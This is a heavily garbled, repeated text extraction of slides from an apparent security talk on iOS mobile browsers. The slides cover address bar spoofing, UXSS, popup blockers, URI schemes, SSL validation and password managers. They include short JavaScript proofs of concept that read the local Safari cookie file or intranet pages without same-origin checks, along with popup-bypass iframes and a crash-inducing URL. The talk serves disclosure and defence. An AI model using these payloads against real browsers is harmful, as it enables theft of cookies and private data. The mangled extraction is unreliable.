bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 58: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/58.jpg)
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 59: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/59.jpg)
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 60: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/60.jpg)
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 61: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/61.jpg)
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 62: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/62.jpg)
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 63: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/63.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 64: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/64.jpg)
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
